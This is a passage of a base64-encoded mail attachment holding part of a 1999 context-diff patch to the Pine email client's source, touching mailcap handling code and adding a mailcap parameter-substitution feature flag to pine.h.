fQ0KKyANCiAgCQlzID0gc3RyaW5kZXgoZnJvbSwgJ30nKTsNCiAgCQlpZigh
cyl7DQogIAkJICAgIHFfc3RhdHVzX21lc3NhZ2UxKFNNX09SREVSLCAwLCA0
LA0KKioqKioqKioqKioqKioqDQoqKiogOTU2LDk2MiAqKioqDQogICAgICAg
IHNwcmludGYodG8sIE1DX0FERF9UTVAsIHRtcF9maWxlKTsNCiAgDQogICAg
ICByZXR1cm4oY3B5c3RyKHRtcF8yMGtfYnVmKSk7DQohIH0gDQogIA0KICAN
CiAgLyoNCi0tLSA5NjQsOTcwIC0tLS0NCiAgICAgICAgc3ByaW50Zih0bywg
TUNfQUREX1RNUCwgdG1wX2ZpbGUpOw0KICANCiAgICAgIHJldHVybihjcHlz
dHIodG1wXzIwa19idWYpKTsNCiEgfQ0KICANCiAgDQogIC8qDQoqKiogLi9w
aW5lL3BpbmUuaC5vcmlnCVRodSBKYW4gMjggMTY6NTI6MDAgMTk5OQ0KLS0t
IC4vcGluZS9waW5lLmgJVHVlIEZlYiAgOSAxOToyMzoyMSAxOTk5DQoqKioq
KioqKioqKioqKioNCioqKiA4ODYsODkxICoqKioNCi0tLSA4ODYsODkyIC0t
LS0NCiAgCUZfU0hPV19URVhUUExBSU5fSU5ULA0KICAJRl9ST0xFX0NPTkZJ
Uk1fREVGQVVMVCwNCiAgCUZfTk9fRkNDX0FUVEFDSCwNCisgCUZfRE9fTUFJ
TENBUF9QQVJBTV9TVUJTVCwNCiAgI2lmZGVmCUVOQUJMRV9MREFQDQogIAlG
X0FERF9MREFQX1RPX0FCT09LLA0KICAjZW5kaWYNCg==
--4100290-15032-918699671=:-197051--